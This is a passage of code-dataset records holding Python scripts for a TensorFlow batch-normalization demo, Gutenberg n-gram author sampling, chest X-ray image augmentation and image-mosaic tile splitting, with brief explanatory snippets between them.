tf.Variable(tf.ones([1]))\n\t\tshift = tf.Variable(tf.zeros([1]))\n\t\tepsilon = 0.001\n\t\t# apply moving average for mean and var when train on batch\n\t\tema = tf.train.ExponentialMovingAverage(decay=0.5)\n\t\tdef mean_var_with_update():\n\t\t\tema_apply_op = ema.apply([fc_mean, fc_var])\n\t\t\twith tf.control_dependencies([ema_apply_op]):\n\t\t\t\treturn tf.identity(fc_mean), tf.identity(fc_var)\n\t\tmean, var = mean_var_with_update()\n\t\txs = tf.nn.batch_normalization(xs, mean, var, shift, scale, epsilon)\n\n\n\t#record inputs for every layer \n\tlayers_inputs = [xs]\n\n\t#build hidden layers\n\tfor l_n in range(N_LAYERS):\n\t\tlayer_input = layers_inputs[l_n]\n\t\tin_size = layers_inputs[l_n].get_shape()[1].value\n\n\t\toutput = add_layer(layer_input, in_size, N_HIDDEN_UNITS, ACTIVATION, norm,)\n\t\tlayers_inputs.append(output)\n\n\n\tprediction = add_layer(layers_inputs[-1], 30, 1, activation_function=None)\n\n\tcost = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction), reduction_indices=[1]))\n\ttrain_op = tf.train.GradientDescentOptimizer(0.001).minimize(cost)\n\treturn [train_op, cost, layers_inputs]\n\n\n#make up data\nfix_seed(1)\nx_data = np.linspace(-7, 10, 2500)[:, 
np.newaxis]\nnp.random.shuffle(x_data)\nnoise = np.random.normal(0, 8, x_data.shape)\ny_data = np.square(x_data) - 5 + noise\n\n\n#plot input data\nplt.scatter(x_data, y_data)\nplt.show()\n\nxs = tf.placeholder(tf.float32, [None, 1])\t\t#[num_samples, num_features]\nys = tf.placeholder(tf.float32, [None, 1])\n\ntrain_op, cost, layers_inputs = built_net(xs, ys, norm=False)\t\t\t\t\t#without BN\ntrain_op_norm, cost_norm, layers_inputs_norm = built_net(xs, ys, norm=True)\t\t#with BN\n\nsess = tf.Session()\ninit = tf.global_variables_initializer\nsess.run(init)\n\n\n#record cost\ncost_his = []\ncost_his_norm = []\nrecord_step = 5\n\nplt.ion()\nplt.figure(figsize=(7, 3))\nfor i in range(250):\n\tif i % 50 == 0:\n\t\tall_inputs, all_inputs_norm = sess.run([layers_inputs, layers_inputs_norm], feed_dict={xs: x_data, ys: y_data})\n\t\tplot_his(all_inputs, all_inputs_norm)\n\n\t# train on batch\n\tsess.run([train_op, train_op_norm], feed_dict={xs: x_data[i*10:i*10+10], ys: y_data[i*10:i*10+10]})\n\n\tif i % record_step == 0:\n\t\t#record cost\n\t\tcost_his.append(sess.run(cost, feed_dict={xs:x_data, ys:y_data}))\n\t\tcost_his_norm.append(sess.run(cost_norm, feed_dict={xs:x_data, ys:y_data}))\n\n\n\nplt.ioff()\nplt.figure()\nplt.plot(np.arange(len(cost_his))*record_step, np.array(cost_his), label='no BN') # no norm\nplt.plot(np.arange(len(cost_his))*record_step, np.array(cost_his_norm), label='BN') # norm\nplt.legend()\nplt.show()\n'''\n\n\nimport tensorflow.compat.v1 as tf \ntf.compat.v1.disable_eager_execution()\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntf.set_random_seed(1)\nnp.random.seed(1)\n\n# Hyper parameters\nN_SAMPLES = 2000\nBATCH_SIZE = 64\nEPOCH = 12\nLR = 0.03\nN_HIDDEN = 8\nACTIVATION = tf.nn.tanh\nB_INIT = tf.constant_initializer(-0.2) # use a bad bias initialization\n\n# training data\nx = np.linspace(-7, 10, N_SAMPLES)[:, np.newaxis]\nnp.random.shuffle(x)\nnoise = np.random.normal(0, 2, x.shape)\ny = np.square(x) - 5 + noise\ntrain_data = np.hstack((x, y))\n\n# test data\ntest_x = np.linspace(-7, 10, 200)[:, np.newaxis]\nnoise = np.random.normal(0, 2, test_x.shape)\ntest_y = np.square(test_x) - 5 + noise\n\n# plot input data\nplt.scatter(x, y, c='#FF9359', s=50, alpha=0.5, label='train')\nplt.legend(loc='upper left')\n\n# tensorflow placeholder\ntf_x = tf.placeholder(tf.float32, [None, 1])\ntf_y = tf.placeholder(tf.float32, [None, 1])\ntf_is_train = tf.placeholder(tf.bool, None) # flag for using BN on training or testing\n\n\nclass NN(object):\n def __init__(self, batch_normalization=False):\n self.is_bn = batch_normalization\n\n self.w_init = tf.random_normal_initializer(0., .1) # weights initialization\n self.pre_activation = [tf_x]\n if self.is_bn:\n self.layer_input = [tf.layers.batch_normalization(tf_x, training=tf_is_train)] # for input data\n else:\n self.layer_input = [tf_x]\n for i in range(N_HIDDEN): # adding hidden layers\n self.layer_input.append(self.add_layer(self.layer_input[-1], 10, ac=ACTIVATION))\n self.out = tf.layers.dense(self.layer_input[-1], 1, kernel_initializer=self.w_init, bias_initializer=B_INIT)\n self.loss = tf.losses.mean_squared_error(tf_y, self.out)\n\n # !! IMPORTANT !! 
the moving_mean and moving_variance need to be updated,\n # pass the update_ops with control_dependencies to the train_op\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.train = tf.train.AdamOptimizer(LR).minimize(self.loss)\n\n def add_layer(self, x, out_size, ac=None):\n x = tf.layers.dense(x, out_size, kernel_initializer=self.w_init, bias_initializer=B_INIT)\n self.pre_activation.append(x)\n # the momentum plays important rule. the default 0.99 is too high in this case!\n if self.is_bn: x = tf.layers.batch_normalization(x, momentum=0.4, training=tf_is_train) # when have BN\n out = x if ac is None else ac(x)\n return out\n\nnets = [NN(batch_normalization=False), NN(batch_normalization=True)] # two nets, with and without BN\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n# plot layer input distribution\nf, axs = plt.subplots(4, N_HIDDEN+1, figsize=(10, 5))\nplt.ion() # something about plotting\n\ndef plot_histogram(l_in, l_in_bn, pre_ac, pre_ac_bn):\n for i, (ax_pa, ax_pa_bn, ax, ax_bn) in enumerate(zip(axs[0, :], axs[1, :], axs[2, :], axs[3, :])):\n [a.clear() for a in [ax_pa, ax_pa_bn, ax, ax_bn]]\n if i == 0: p_range = (-7, 10); the_range = (-7, 10)\n else: p_range = (-4, 4); the_range = (-1, 1)\n ax_pa.set_title('L' + str(i))\n ax_pa.hist(pre_ac[i].ravel(), bins=10, range=p_range, color='#FF9359', alpha=0.5)\n ax_pa_bn.hist(pre_ac_bn[i].ravel(), bins=10, range=p_range, color='#74BCFF', alpha=0.5)\n ax.hist(l_in[i].ravel(), bins=10, range=the_range, color='#FF9359')\n ax_bn.hist(l_in_bn[i].ravel(), bins=10, range=the_range, color='#74BCFF')\n for a in [ax_pa, ax, ax_pa_bn, ax_bn]:\n a.set_yticks(()); a.set_xticks(())\n ax_pa_bn.set_xticks(p_range); ax_bn.set_xticks(the_range); axs[2, 0].set_ylabel('Act'); axs[3, 0].set_ylabel('BN Act')\n plt.pause(0.01)\n\nlosses = [[], []] # record test loss\nfor epoch in range(EPOCH):\n print('Epoch: ', epoch)\n np.random.shuffle(train_data)\n step = 0\n in_epoch = True\n while in_epoch:\n b_s, b_f = (step*BATCH_SIZE) % len(train_data), ((step+1)*BATCH_SIZE) % len(train_data) # batch index\n step += 1\n if b_f < b_s:\n b_f = len(train_data)\n in_epoch = False\n b_x, b_y = train_data[b_s: b_f, 0:1], train_data[b_s: b_f, 1:2] # batch training data\n sess.run([nets[0].train, nets[1].train], {tf_x: b_x, tf_y: b_y, tf_is_train: True}) # train\n\n if step == 1:\n l0, l1, l_in, l_in_bn, pa, pa_bn = sess.run(\n [nets[0].loss, nets[1].loss, nets[0].layer_input, nets[1].layer_input,\n nets[0].pre_activation, nets[1].pre_activation],\n {tf_x: test_x, tf_y: test_y, tf_is_train: False})\n [loss.append(l) for loss, l in zip(losses, [l0, l1])] # recode test loss\n plot_histogram(l_in, l_in_bn, pa, pa_bn) # plot histogram\n\nplt.ioff()\n\n# plot test loss\nplt.figure(2)\nplt.plot(losses[0], c='#FF9359', lw=3, label='Original')\nplt.plot(losses[1], c='#74BCFF', lw=3, label='Batch Normalization')\nplt.ylabel('test loss'); plt.ylim((0, 2000)); plt.legend(loc='best')\n\n# plot prediction line\npred, pred_bn = sess.run([nets[0].out, nets[1].out], {tf_x: test_x, tf_is_train: False})\nplt.figure(3)\nplt.plot(test_x, pred, c='#FF9359', lw=4, label='Original')\nplt.plot(test_x, pred_bn, c='#74BCFF', lw=4, label='Batch Normalization')\nplt.scatter(x[:200], y[:200], c='r', s=50, alpha=0.2, label='train')\nplt.legend(loc='best'); 
plt.show()","sub_path":"TensorFlow/batch_n.py","file_name":"batch_n.py","file_ext":"py","file_size_in_byte":10134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
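Stripped of TensorFlow, the transform both networks apply is the same per-feature recipe: normalize over the batch axis, then rescale with the learned gamma (scale) and beta (shift). A NumPy sketch:

import numpy as np

def batch_norm(x, gamma, beta, epsilon=0.001):
    # Normalize each feature over the batch axis, then rescale and reshift.
    mean = x.mean(axis=0)
    var = x.var(axis=0)
    x_hat = (x - mean) / np.sqrt(var + epsilon)
    return gamma * x_hat + beta

x = np.random.normal(5.0, 3.0, size=(64, 8))            # batch of 64, 8 features
y = batch_norm(x, gamma=np.ones(8), beta=np.zeros(8))
print(y.mean(axis=0).round(3), y.std(axis=0).round(3))  # ~0 and ~1 per feature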
+{"seq_id":"351619735","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom math import floor\nimport numpy as np\nimport pandas as pd\nimport random\nimport pickle\nimport codecs\nimport csv\nimport os\n\n# CLEAN TEXT\n'''\n\npath = os.getcwd()+\"/gutenberg\"\n\ninitial_text2cut_1 = \"with this eBook or online at www.gutenberg.\"\ninitial_text2cut_2 = \"*END*THE SMALL PRINT! FOR PUBLIC DOMAIN ETEXTS*\"\n\nfinal_text2cut_1 = \"END OF THIS PROJECT GUTENBERG EBOOK\"\nfinal_text2cut_2 = \"END OF THE PROJECT GUTENBERG EBOOK\"\n\nwith open(\"gut_index.csv\", \"r\") as csv_file:\n reader = csv.DictReader(csv_file, delimiter=',')\n for book in reader:\n path_book = path[:]\n if len(book[\"id\"]) == 1:\n path_book += '/0/'+book[\"id\"]+'/'+book[\"id\"]+\".txt\"\n else:\n for i in range(len(book[\"id\"])-1):\n path_book += '/'+book[\"id\"][i]\n path_book += '/'+book[\"id\"]\n if path_book[-1] == 'C':\n path_book = path_book[:-1]\n try:\n possible_txts = os.listdir(path_book)\n if path_book.split(\"/\")[-1]+\".txt\" in possible_txts:\n path_book += \"/\"+book[\"id\"]+\".txt\"\n else:\n for possible_txt in possible_txts:\n if \".txt\" in possible_txt and not \"readme.txt\" in possible_txt:\n path_book += \"/\"+possible_txt\n break;\n except FileNotFoundError:\n pass\n\n try:\n with codecs.open(path_book, \"r\",encoding='utf-8', errors='ignore') as book_file:\n cv = CountVectorizer(min_df=2, stop_words='english',ngram_range=(5, 5), analyzer='word')\n analyzer = cv.build_tokenizer()\n\n #print(path_book)\n\n text = book_file.read()\n if initial_text2cut_1 in text:\n index_start = text.index(initial_text2cut_1)+len(initial_text2cut_1)+3\n elif initial_text2cut_2 in text:\n index_start = text.index(initial_text2cut_2)+len(initial_text2cut_2)+3\n else:\n index_start = 250\n \n if final_text2cut_1 in text:\n index_end = text.index(final_text2cut_1)\n elif final_text2cut_2 in text:\n index_end = text.index(final_text2cut_2)\n else:\n index_end = len(text)-200\n\n text = text[index_start:index_end]\n\n #print(index_start, index_end)\n \n tokens = analyzer(text)\n except FileNotFoundError as error:\n try:\n path_book = \"/\".join(path_book.split(\"/\")[:-2])+\"/\"+path_book.split(\"/\")[-1]+\"/\"+path_book.split(\"/\")[-1]+\".txt\"\n with codecs.open(path_book, \"r\",encoding='utf-8', errors='ignore') as book_file:\n cv = CountVectorizer(min_df=2, stop_words='english',ngram_range=(5, 5), analyzer='word')\n analyzer = cv.build_tokenizer()\n\n #print(path_book)\n\n text = book_file.read()\n if initial_text2cut_1 in text:\n index_start = text.index(initial_text2cut_1)+len(initial_text2cut_1)+3\n elif initial_text2cut_2 in text:\n index_start = text.index(initial_text2cut_2)+len(initial_text2cut_2)+3\n else:\n index_start = 250\n\n if final_text2cut_1 in text:\n index_end = text.index(final_text2cut_1)\n elif final_text2cut_2 in text:\n index_end = text.index(final_text2cut_2)\n else:\n index_end = len(text)-200\n \n text = text[index_start:index_end]\n #print(index_start, index_end)\n tokens = analyzer(text)\n except (IsADirectoryError, FileNotFoundError) as error:\n print(path_book+\" ERROR\")\n continue;\n except IsADirectoryError:\n continue;\n \n print(path_book+\" OK\")\n with open(os.getcwd()+\"/ngrams/\"+path_book.split(\"/\")[-1][:-4]+\".pkl\", 'wb') as f:\n pickle.dump(tokens, f)\n\n\n# CALCULATE SIMILARITY AND RANK BOOKS BY AUTHOR\n\n\ndf = pd.read_csv(os.getcwd()+\"/gut_index.csv\")\n\nbooks_by_author = df.groupby('author')\n\ncoincident_books = []\nless_coincident_books = 
[]\ncoincident_books_list = []\n\nfor author, ids in books_by_author:\n ids = list(ids['id'])\n \n for i in range(len(ids)):\n for j in range(len(ids)):\n if i != j:\n directory_book_ref = os.getcwd()+\"/ngrams/\"+ids[i]\n directory_book_delete = os.getcwd()+\"/ngrams/\"+ids[j]\n\n if directory_book_ref[-1] == 'C':\n directory_book_ref = directory_book_ref[:-1]\n\n if directory_book_delete[-1] == 'C':\n directory_book_delete = directory_book_delete[:-1]\n try:\n with open(directory_book_ref+\".pkl\", 'rb') as book_ref:\n with open(directory_book_delete+\".pkl\", 'rb') as book_delete:\n book_ngrams = pickle.load(book_ref)\n book_possible_delete = pickle.load(book_delete)\n\n if(len(book_possible_delete)>0 and len(book_ngrams)>0):\n #max-min\n coincident_ngrams = len(set(book_ngrams).intersection(set(book_possible_delete)))/min(len(book_possible_delete), len(book_ngrams))\n coincident_books.append((author,ids[i],ids[j],coincident_ngrams))\n \n except FileNotFoundError as error:\n pass\n\n \n coincident_books.sort(key=lambda tup: tup[3])\n for i in range(len(coincident_books)):\n if(coincident_books[i][3] < 0.1):\n less_coincident_books.append(list(coincident_books[i]))\n\n if(len(less_coincident_books)>0):\n coincident_books_list += less_coincident_books\n print(ids)\n coincident_books = []\n less_coincident_books = []\n\nheaders = [\"author\",\"book1\",\"book2\",\"score\"]\ndf = pd.DataFrame(coincident_books_list, columns=headers)\n\nsum_scores = pd.pivot_table(df,index=[\"author\",\"book1\"],values=[\"score\"], aggfunc=np.sum).sort_values('score')\n\ndf.to_csv(\"book_scores_ordered.csv\", sep=',', encoding='utf-8')\n\n\n#os.remove()\n\n'''\n\ndef get_directory(book_id):\n \n path_book = os.getcwd()+\"/gutenberg\"\n\n if len(book_id) == 1:\n path_book += '/0/'+book_id+'/'+book_id+\".txt\"\n else:\n for i in range(len(book_id)-1):\n path_book += '/'+book_id[i]\n path_book += '/'+book_id\n if path_book[-1] == 'C':\n path_book = path_book[:-1]\n try:\n possible_txts = os.listdir(path_book)\n if path_book.split(\"/\")[-1]+\".txt\" in possible_txts:\n path_book += \"/\"+book_id+\".txt\"\n elif path_book.split(\"/\")[-1]+\"-0.txt\" in possible_txts:\n path_book += \"/\"+book_id+\"-0.txt\"\n elif path_book.split(\"/\")[-1]+\"-8.txt\" in possible_txts:\n path_book += \"/\"+book_id+\"-8.txt\"\n except FileNotFoundError:\n pass\n\n return path_book\n\nrandom.seed(9001)\n\n# Read scores by author\ndf = pd.read_csv(\"book_scores_ordered.csv\", sep=',')\n\n# Drop useless column\ndf.drop(['Unnamed: 0'], inplace=True, axis=1)\n\n#df_f = df.groupby(['author']).agg(['count'])\n\n# Filter authors with al least 3, 6 and 11 authors\ndf3 = df.groupby(['author']).filter(lambda x: x['book1'].nunique() > 2)\ndf6 = df.groupby(['author']).filter(lambda x: x['book1'].nunique() > 5)\ndf11 = df.groupby(['author']).filter(lambda x: x['book1'].nunique() > 10)\n\n# Sum of scores by book\ndf3_sum = pd.pivot_table(df3,index=[\"author\",\"book1\"],values=[\"score\"], aggfunc=np.sum)\ndf6_sum = pd.pivot_table(df6,index=[\"author\",\"book1\"],values=[\"score\"], aggfunc=np.sum)\ndf11_sum = pd.pivot_table(df11,index=[\"author\",\"book1\"],values=[\"score\"], aggfunc=np.sum)\n\n# Get list of all authors\ndistinct_authors_3 = np.array(df3.author.unique())\ntotal_size_3 = len(distinct_authors_3)\n\ndistinct_authors_6 = np.array(df6.author.unique())\ntotal_size_6 = len(distinct_authors_6)\n\ndistinct_authors_11 = np.array(df11.author.unique())\ntotal_size_11 = len(distinct_authors_11)\n\n\n# From the N remaining authors we take 100 
randomly and iteratively until we consume the N authors. From those 100 authors,\n# we take once again 10 authors randomly which will be used to form the matrix of the model\n\n# Number of author from which 10 (selection_f) authors will be finally selected to be part of the matrix of the model\nselection_r = 100\n\n# Number of authors selected to be part of the matrix of the model\nselection_f = 10\n\n# Remaining books to select once the max/min score books are selected (2 for 3 books, 5 for 6 books and 10 for 11 books)\nremaining_f = 5\n\n# Choose size\ntotal_size = total_size_6\n\n# Choose authors size\ndistinct_authors = distinct_authors_6[:]\n\n# Number of iterations\nnum_iterations = floor(total_size/selection_r)\n\n# Lists containing the final 10 authors of all the iterations\nauthor_names_list = []\n\nprint(\"Total of {} authors\".format(total_size))\n\n# Generate 10 random indexes to select 'selection_f = 10' authors\nfor i in range(num_iterations):\n\n # take randomly selection_r indexes\n selected_authors_indexes = random.sample(range(total_size), selection_r)\n\n # get the author names associated to the indexes generated\n selected_authors_names = distinct_authors[selected_authors_indexes]\n\n # delete the author names selected from the list which contains all the author names\n distinct_authors = np.delete(distinct_authors, (selected_authors_indexes), axis=0)\n\n # reduce total size after deleting the selected names\n total_size = len(distinct_authors)\n\n # take randomly selection_f indexes out of selection_r\n selected_authors_indexes = random.sample(range(selection_r), selection_f)\n\n # get the author names associated to the indexes generated\n selected_authors_names = selected_authors_names[selected_authors_indexes]\n\n # save the 10 names selected in current iteration\n author_names_list.append(selected_authors_names)\n\n# Get the 3, 6 or 11 books from each author\n# When 3: 1-Min Known text and 2-Random for matrix, 1-Max Known text and 2-Random for matrix, 1-Random Known text and 2-Random for matrix\n# When 6: 1-Min Known text and 5-Random for matrix, 1-Max Known text and 5-Random for matrix, 1-Random Known text and 5-Random for matrix\n# When 11: 1-Min Known text and 10-Random for matrix, 1-Max Known text and 10-Random for matrix, 1-Random Known text and 10-Random for matrix\n\n'''\n# Min\nprint(\"\\n\\nMIM\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\nfor i in range(len(author_names_list)):\n print(\"iteration: \"+str(i+1))\n print(\"\\n\")\n with open(\"gut_min_max_rand/size3/min/size3_min_\" +str(i+1)+ \".csv\", \"w\") as csv_file:\n writer = csv.writer(csv_file, delimiter=',')\n writer.writerow([\"author\", \"book\", \"special\", \"directory\"])\n for author in author_names_list[i]:\n print(\"________________________________________________________________________\")\n print(author+\"\\n\")\n author_df = pd.DataFrame(df3_sum.loc[author].to_records()).sort_values('score')\n\n print(\"\\nMin\")\n print(author_df.iloc[0]['book1'])\n writer.writerow([author, author_df.iloc[0]['book1'], \"True\", get_directory(author_df.iloc[0]['book1'])])\n\n author_df = author_df.drop(author_df.index[0])\n remaining_indexes = random.sample(range(len(author_df)), remaining_f)\n remaining_books = author_df.iloc[remaining_indexes]\n print(\"\\nRemaining\")\n\n for row in remaining_books.to_records():\n print(row[1])\n writer.writerow([author, row[1], \"False\", get_directory(row[1])])\n\n\n# 
Max\nprint(\"\\n\\nMAX\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\nfor i in range(len(author_names_list)):\n print(\"iteration: \"+str(i+1))\n print(\"\\n\")\n with open(\"gut_min_max_rand/size3/max/size3_max_\" +str(i+1)+ \".csv\", \"w\") as csv_file:\n writer = csv.writer(csv_file, delimiter=',')\n writer.writerow([\"author\", \"book\", \"special\", \"directory\"])\n for author in author_names_list[i]:\n print(\"________________________________________________________________________\")\n print(author+\"\\n\")\n author_df = pd.DataFrame(df3_sum.loc[author].to_records()).sort_values('score')\n\n print(\"\\nMax\")\n print(author_df.iloc[-1]['book1'])\n writer.writerow([author, author_df.iloc[-1]['book1'], \"True\", get_directory(author_df.iloc[-1]['book1'])])\n\n author_df = author_df.drop(author_df.index[-1])\n remaining_indexes = random.sample(range(len(author_df)), remaining_f)\n remaining_books = author_df.iloc[remaining_indexes]\n print(\"\\nRemaining\")\n\n for row in remaining_books.to_records():\n print(row[1])\n writer.writerow([author, row[1], \"False\", get_directory(row[1])])\n\n'''\n# Random\nprint(\"\\n\\nRANDOM\\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\nfor i in range(len(author_names_list)):\n print(\"iteration: \"+str(i+1))\n print(\"\\n\")\n with open(\"gut_min_max_rand/size6/rand/size6_rand_\" +str(i+1)+ \".csv\", \"w\") as csv_file:\n writer = csv.writer(csv_file, delimiter=',')\n writer.writerow([\"author\", \"book\", \"special\", \"directory\"])\n for author in author_names_list[i]:\n print(\"________________________________________________________________________\")\n print(author+\"\\n\")\n author_df = pd.DataFrame(df6_sum.loc[author].to_records())\n\n print(author_df)\n print(\"len: \", len(author_df), \"selection_factor: \", remaining_f+1)\n remaining_indexes = random.sample(range(len(author_df)), remaining_f+1)\n remaining_books = author_df.iloc[remaining_indexes]\n\n for row in remaining_books.to_records():\n writer.writerow([author, row[1], \"False\", get_directory(row[1])])\n\n","sub_path":"gut_ngram.py","file_name":"gut_ngram.py","file_ext":"py","file_size_in_byte":14429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
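The similarity that drives the ranking is the overlap coefficient on 5-gram sets, |A ∩ B| / min(|A|, |B|) (the line marked #max-min in the commented block above). In isolation:

def overlap_coefficient(ngrams_a, ngrams_b):
    a, b = set(ngrams_a), set(ngrams_b)
    if not a or not b:
        return 0.0
    # 1.0 when the smaller set is fully contained in the larger one.
    return len(a & b) / min(len(a), len(b))

print(overlap_coefficient(['a b c d e', 'b c d e f'], ['b c d e f']))  # 1.0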
+{"seq_id":"294001799","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 14 13:43:36 2020\r\n\r\n@author: bmsri\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\nimport imageio\r\n\r\nfrom sklearn.utils import shuffle\r\nfrom sklearn.model_selection import train_test_split\r\nimport shutil\r\nimport matplotlib.pyplot as plt\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\n\r\nNUM_AUG_IMAGES_WANTED = 10000\r\n\r\nIMAGE_HEIGHT = 200\r\nIMAGE_WIDTH = 200\r\n\r\ntrain_image_list = os.listdir('D:\\\\PR_term_proj\\\\chest-xray-pneumonia\\\\chest_xray\\\\train')\r\n\r\ndf_train = pd.DataFrame(train_image_list, columns=['image_path'])\r\n\r\ndf_train.reset_index(inplace=True, drop=True)\r\n\r\n\r\n \r\ntrain_img_path = 'D:\\\\PR_term_proj\\\\chest-xray-pneumonia\\\\chest_xray\\\\train' \r\n\r\n\r\nbase_dir = 'base_dir'\r\nos.mkdir(base_dir)\r\n\r\ntrain_dir = os.path.join(base_dir, 'train_dir')\r\nos.mkdir(train_dir)\r\n\r\n\r\nNormal = os.path.join(train_dir, 'NORMAL')\r\nos.mkdir(Normal)\r\nPneumonia = os.path.join(train_dir, 'PNEUMONIA')\r\nos.mkdir(Pneumonia)\r\n\r\n\r\nfolder_1 = os.listdir(train_img_path)\r\n\r\ntrain_path_norm = os.path.join(train_img_path, 'NORMAL')\r\ntrain_path_pne = os.path.join(train_img_path, 'PNEUMONIA')\r\n\r\ntrain_list_norm = sorted(os.listdir(train_path_norm))\r\ntrain_list_pne = sorted(os.listdir(train_path_pne))\r\n\r\n\r\ncomp_path = 'D:\\\\PR_term_proj\\\\'\r\n\r\n#df_data.set_index('image_path', inplace=True)\r\nfrom PIL import Image\r\n\r\nfor image in train_list_norm: \r\n fname = image\r\n #label = df_data.loc[image, 'target']\r\n \r\n #if fname in folder_1:\r\n \r\n src = train_path_norm + '\\\\' + fname\r\n dst = comp_path + train_dir + '\\\\' + \"NORMAL\" + '\\\\' + fname\r\n \r\n image = Image.open(src)\r\n image=image.resize([200,200])\r\n print(np.shape(image))\r\n if (len(np.shape(image)) == 2):\r\n image.save(dst)\r\n \r\n\r\nfor image in train_list_pne: \r\n fname = image\r\n \r\n src = train_path_pne + '\\\\' + fname\r\n dst = comp_path + train_dir + '\\\\' + \"PNEUMONIA\" + '\\\\' + fname\r\n \r\n image = Image.open(src)\r\n# print(np.shape(image))\r\n image=image.resize([200,200])\r\n print(np.shape(image))\r\n if (len(np.shape(image)) == 2):\r\n image.save(dst)\r\n\r\n\r\n'''\r\nData Augmentation\r\n''' \r\naug_dir = 'aug_dir'\r\nos.mkdir(aug_dir)\r\n \r\nclass_list = ['NORMAL','PNEUMONIA']\r\n\r\nfor item in class_list:\r\n \r\n \r\n img_class = item\r\n\r\n img_list = sorted(os.listdir(comp_path + 'base_dir\\\\train_dir\\\\' + img_class))\r\n\r\n os.mkdir(aug_dir+ \"\\\\\" + item)\r\n##\r\n for fname in img_list:\r\n src = os.path.join(comp_path + 'base_dir\\\\train_dir\\\\' + img_class, fname)\r\n dst = os.path.join(aug_dir+ \"\\\\\" + item, fname)\r\n shutil.copyfile(src, dst)\r\n\r\n path = aug_dir+ \"\\\\\"# + item + \"\\\\\"\r\n save_path = comp_path + 'base_dir\\\\train_dir\\\\' + img_class\r\n\r\n datagen = ImageDataGenerator(rotation_range=40, width_shift_range=0.2, height_shift_range=0.2, shear_range=0.2, zoom_range=0.2, horizontal_flip=True)\r\n#rescale=1/255, \r\n batch_size = 50\r\n \r\n # classes=[item] keeps the generator on the current class subfolder only,\r\n # so augmented NORMAL and PNEUMONIA images are never mixed together\r\n aug_datagen = datagen.flow_from_directory(path, classes=[item], save_to_dir=aug_dir+ \"\\\\\" + item + \"\\\\\", save_format='jpg', target_size=(IMAGE_HEIGHT,IMAGE_WIDTH), batch_size=batch_size)\r\n \r\n num_files = len(os.listdir(aug_dir+ \"\\\\\" + item))\r\n \r\n num_batches = int(np.ceil((NUM_AUG_IMAGES_WANTED-num_files)/batch_size))\r\n\r\n for i in range(0,num_batches):\r\n #imgs = 
Image.open(aug_datagen)\r\n imgs, labels = next(aug_datagen)\r\n print(np.shape(imgs))\r\n\r\n \r\n","sub_path":"data_gen_for_aug.py","file_name":"data_gen_for_aug.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
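The `classes=[item]` argument on `flow_from_directory` above matters: without it the generator walks the parent aug_dir and draws from both class subfolders while saving into one class's folder. A minimal standalone check of the restricted call (directory names assumed to match the script's layout):

from keras.preprocessing.image import ImageDataGenerator

datagen = ImageDataGenerator(rotation_range=40, horizontal_flip=True)
# Only images under aug_dir/NORMAL are yielded; PNEUMONIA is ignored,
# so files written by save_to_dir cannot cross classes.
gen = datagen.flow_from_directory('aug_dir', classes=['NORMAL'],
                                  target_size=(200, 200), batch_size=50,
                                  save_to_dir='aug_dir/NORMAL', save_format='jpg')
imgs, labels = next(gen)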
+{"seq_id":"275384058","text":"import scipy.misc as misc\nimport numpy as np\nimport time\nimport numpy as np\nfrom glob import glob\nimport os\nimport cv2\n\n\n\ndef resize(image,image_width):\n # image = np.int(255*image)\n image = cv2.resize(image, (image_width, image_width), interpolation=cv2.INTER_LINEAR)\n return image\n\n\ndef images_selection(file_name, image_width, image_channel, batch_size, num_generations, support_number):\n filenames = glob(os.path.join(file_name, '*.*'))\n fake_categories = len(filenames) * batch_size\n fake_images = np.zeros([fake_categories * num_generations, image_width, image_width, image_channel])\n for i,image_path in enumerate(filenames):\n store_name = file_name + '_split/'\n if not os.path.exists(store_name):\n os.mkdir(store_name)\n current_x = misc.imread(image_path)\n image_size = int(np.shape(current_x)[0]/ batch_size)\n for j in range(batch_size):\n for k in range(support_number+num_generations):\n current_iamge = current_x[image_size*j:image_size*(j+1),image_size*(k):image_size*(k+1)]\n current_iamge = resize(current_iamge,128)\n # if len(np.shape(current_iamge))<3:\n # current_iamge = np.expand_dims(current_iamge,axis=-1)\n current_name = store_name + image_path.split('/')[-1].split('png')[0] + 'batch{}_sample{}.png'.format(j,k) \n misc.imsave(current_name, current_iamge)\n\n\n\nfile_name = '/media/user/05e85ab6-e43e-4f2a-bc7b-fad887cfe312/meta_gan/MatchingGAN-SelfAttention-XS/VISUALIZATION/vggface/1shot/visual_outputs/'\nimage_width = 128\nimage_channel =3\nbatch_size = 20\nnum_generations = 60\nsupport_number = 3\nimages_selection(file_name, image_width, image_channel, batch_size, num_generations, support_number)","sub_path":"visluazation_images_selection.py","file_name":"visluazation_images_selection.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
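The nested loop that cuts each mosaic into tiles is plain stride arithmetic; the same slicing on a synthetic array makes the tile geometry easy to verify:

import numpy as np

batch_size, cells, tile = 2, 4, 8        # 2 rows of samples, 4 tiles per row
mosaic = np.arange(batch_size * tile * cells * tile).reshape(batch_size * tile,
                                                             cells * tile)
for j in range(batch_size):
    for k in range(cells):
        # Same indexing as image_size*j:image_size*(j+1) in the script.
        tile_jk = mosaic[tile * j:tile * (j + 1), tile * k:tile * (k + 1)]
        assert tile_jk.shape == (tile, tile)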
